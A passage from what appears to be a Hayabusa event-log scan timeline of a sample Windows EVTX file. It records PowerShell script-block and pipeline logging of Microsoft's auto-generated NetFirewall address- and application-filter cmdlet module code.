'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' -Alias '*' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.251 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.252 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.253 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.253 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.299 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.299 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 